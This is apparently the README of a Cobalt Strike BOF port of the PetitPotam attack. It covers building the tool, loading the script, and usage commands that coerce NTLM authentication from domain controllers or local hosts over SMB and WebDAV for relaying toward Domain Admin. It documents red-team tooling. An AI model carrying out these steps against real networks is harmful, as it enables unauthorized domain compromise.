A BOF port of the PetitPotam attack published by @topotam77
The PetitPotam attack is a way to remotely coerce a Windows hosts into authenticating to other systems. It abuses functionality of the MS-EFSRPC (Encrypting File System Remote) protocol, which was incompletely patched by Microsoft in the September 2021 patch round.
MS-EFSRPC allows an attacker to coerce a system into authenticating to a destination system chosen by the attacker using NTLM authentication. With a NTLM relaying tool such as responder.py or Impacket's ntlmrelayx.py you can relay to another system that accepts NTLM based authentication. The impact differs on the source and destination systems, but in some cases it may provide you with near-instant Domain Admin privileges.
- Make sure that Mingw-w64 (including mingw-w64-binutils) has been installed.
- Enter the SOURCE folder within the tool folder.
- Type "make" to compile the object files.
- Use Cobal Strike script manager to import the
PetitPotam.cnascript.
Running the tool is straightforward. Once you imported the CNA script using Cobalt Strike's Script Manager, they are available as Cobalt Strike commands that can be executed within a beacon. This tool supports the following commands:
PetitPotam [capture server ip or hostname] [target server ip or hostname]
First, prepare your relaying setup (responder, ntlmrelayx e.g.). Then:
- Perform a SMB relay attack with
PetitPotam KALI DC2019to coerce authentication from a DC to a KALI machine under our control. - Perform a WebDAV (LDAP/RBCD relay) LPE attack with
PetitPotam KALI@80/nop localhostto coerce authentication from our machine using WebDAV (HTTP) to a KALI machine under our control. - Perform a WebDAV (LDAP/RBCD relay) LPE attack with
PetitPotam localhost@80/nop localhostto coerce authentication from our machine using WebDAV (HTTP) and relay back to our teamserver using socks/rportfwd'ing.
- To be able to coerce authentication using the WebDAV protocol, the WebDAV redirector service needs to be installed (default on client versions of Windows) and the WebClient service needs to be started. On a local Windows client the service can be started using the StartWebClient BOF which is available within this repository.
- If you need to relay back to your teamserver (running responder or ntlmrelayx) it is necessary to start 2 separate beacons. One beacon is configured as the socks proxy and reverse port forwarder, the other beacon is used to execute the attack. You won't have this shortcoming in the reflective DLL version of the code, but this version requires a Fork&Run operation.
This BOF tool has been successfully compiled on Mac OSX systems and used on Windows 8.1+ (x64) systems. Compiling the BOF code should also work on other systems (Linux, Windows) that have the Mingw-w64 compiler installed.
- This code is inspired by @topotam77 PetitPotam exploit: https://github.com/topotam/PetitPotam
- @b4rtik for help converting the RPC code to be BOF compatible.